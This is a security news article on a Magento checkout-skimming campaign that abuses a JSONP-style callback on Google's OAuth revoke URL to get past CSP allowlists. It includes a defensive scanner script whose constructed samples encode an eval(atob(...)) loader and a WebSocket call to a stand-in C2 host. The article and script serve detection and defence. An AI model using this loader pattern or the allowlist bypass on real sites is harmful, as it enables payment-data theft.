- Attackers use a real Google URL to slip malware past antivirus software and the browser undetected
- The malware only activates during checkout, making it a silent threat to online payments
- The script opens a WebSocket connection for live control, completely invisible to the average user
A new browser-based malware campaign has surfaced, showing how attackers now exploit trusted domains such as Google.com to bypass traditional antivirus defenses.
According to a report by security researchers at C/SIDE, the technique is subtle, conditionally triggered and hard for both users and conventional security software to spot.
It appears to originate from a legitimate OAuth-related URL, but covertly executes a malicious payload with full access to the user's browser session.
Malware hidden in plain sight
The attack starts with a script embedded in a compromised Magento-based e-commerce site that references an apparently harmless Google OAuth token-revocation URL: https://accounts.google.com/oauth2/revoke.
However, the URL carries a manipulated callback parameter. Because the endpoint echoes that callback name back in its JSONP-style response, the browser ends up running an obfuscated JavaScript payload via eval(atob(...)).
Using Google's domain is central to the deception: because the script loads from a trusted origin, most content security policies (CSP) that allowlist accounts.google.com as a script source, and most DNS filters, let it through without question.
The script only activates under specific conditions. If the browser appears automated, or the page URL contains the word "payment", it silently opens a WebSocket connection to a malicious server, tailoring its behaviour to what the user is doing.
Any payload sent over this channel is Base64-encoded; the script decodes it and runs it dynamically via the JavaScript Function constructor.
With this setup, the attacker can execute arbitrary code in the victim's browser remotely and in real time.
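To make the loader pattern concrete, here is an added example of the check a site owner or a scanner could run over the script URLs a page loads. It is my own illustration, not code from the C/SIDE report or from Magento, and the trusted-host list, the parameter names and the sample payloads are assumptions: the script flags any query parameter on a trusted OAuth host that itself contains executable JavaScript or Base64 text that decodes to it, and applies the same decoder to a frame of the kind the article says the WebSocket channel carries.

```javascript
// Added example (not from the C/SIDE report): a static check for <script src>
// URLs that point at a trusted OAuth host but carry executable JavaScript in a
// query parameter, the JSONP-style callback abuse described above. The host
// list, parameter names and sample payloads are assumptions for illustration.

const TRUSTED_OAUTH_HOSTS = new Set(["accounts.google.com"]);

// Calls that a JSONP callback name or a decoded payload should never contain.
const EXEC_PATTERN = /\b(eval|atob|Function|WebSocket|document\.write|setTimeout)\s*\(/;

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

// Parse the query string by hand so that '+' inside Base64 is not turned into
// a space (URLSearchParams would do that and corrupt the encoded payload).
function queryParams(url) {
  const q = url.search.startsWith("?") ? url.search.slice(1) : url.search;
  const pairs = [];
  for (const part of q.split("&")) {
    if (!part) continue;
    const i = part.indexOf("=");
    const name = i < 0 ? part : part.slice(0, i);
    const value = i < 0 ? "" : part.slice(i + 1);
    pairs.push([safeDecode(name), safeDecode(value)]);
  }
  return pairs;
}

// Find Base64-looking runs and return those that decode to printable text,
// which is what a second-stage JavaScript payload looks like.
function decodeBase64Chunks(text) {
  const out = [];
  const re = /[A-Za-z0-9+/]{24,}={0,2}/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const decoded = Buffer.from(m[0], "base64").toString("utf8");
    if (/^[\x09\x0a\x0d\x20-\x7e]+$/.test(decoded)) out.push(decoded);
  }
  return out;
}

function analyzeScriptSrc(src) {
  let url;
  try { url = new URL(src); } catch { return { verdict: "invalid-url", host: null, reasons: [] }; }
  const reasons = [];
  for (const [name, value] of queryParams(url)) {
    if (EXEC_PATTERN.test(value)) {
      reasons.push(`param "${name}" contains executable JS: ${value.slice(0, 40)}`);
    }
    for (const decoded of decodeBase64Chunks(value)) {
      if (EXEC_PATTERN.test(decoded)) {
        reasons.push(`param "${name}" carries Base64-encoded JS: ${decoded.slice(0, 40)}`);
      }
    }
  }
  const trusted = TRUSTED_OAUTH_HOSTS.has(url.hostname);
  const verdict = reasons.length === 0 ? "clean" : trusted ? "trusted-host-abuse" : "suspicious";
  return { verdict, host: url.hostname, reasons };
}

// The same decoder applied to a frame received over the C2 WebSocket: the
// article describes these as Base64 text fed to the Function constructor.
function inspectChannelFrame(frame) {
  return decodeBase64Chunks(frame).filter((d) => EXEC_PATTERN.test(d));
}

// Constructed samples (not real attack data). The "second stage" is a harmless
// one-liner that merely resembles the behaviour described in the article.
const SECOND_STAGE = 'new WebSocket("wss://c2.example.invalid/ws")';
const SAMPLE_C2_FRAME = Buffer.from(SECOND_STAGE, "utf8").toString("base64");
const SAMPLE_SCRIPT_SRCS = [
  "https://accounts.google.com/oauth2/revoke?token=ya29.example-token",
  "https://accounts.google.com/oauth2/revoke?callback=" +
    encodeURIComponent(`eval(atob("${SAMPLE_C2_FRAME}"))`),
  "https://cdn.example.invalid/lib.js?cb=" +
    encodeURIComponent(`Function(atob("${SAMPLE_C2_FRAME}"))()`),
];

if (typeof require !== "undefined" && require.main === module) {
  for (const src of SAMPLE_SCRIPT_SRCS) console.log(analyzeScriptSrc(src));
  console.log(inspectChannelFrame(SAMPLE_C2_FRAME));
}
```

The point of the "trusted-host-abuse" verdict is that domain reputation alone is the wrong signal here: the first sample is a perfectly ordinary revoke call and stays clean, while the second goes to the same Google host and is still flagged because the callback value is code, not an identifier. The heuristic is deliberately simple and will miss payloads that are split across parameters or encoded differently, so treat it as a starting point for content inspection rather than a complete detector.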
A key factor in the attack's effectiveness is its ability to evade many of the best antivirus programs on the market.
The script's logic is heavily obfuscated and only fires under certain conditions, so it is unlikely to be caught even by the best Android antivirus apps or by static malware scanners.
Such tools do not inspect, flag or block JavaScript payloads delivered through seemingly legitimate OAuth flows.
DNS-based filters and firewall rules also offer limited protection, since the initial request goes to Google's legitimate domain.
In enterprise environments, even some of the best endpoint protection tools may struggle to detect this activity if they rely heavily on domain reputation or do not inspect dynamic script execution inside the browser.
Although advanced users and security teams can use content inspection or behavioral analysis tools to identify anomalies like these, average users remain exposed.
Limiting third-party scripts, separating the browser sessions used for financial transactions and watching for unexpected site behaviour can help reduce the risk in the short term. Site operators have one further lever: a script-src policy that omits 'unsafe-eval' blocks the eval() and Function() calls this loader depends on, even when accounts.google.com is an allowed script source.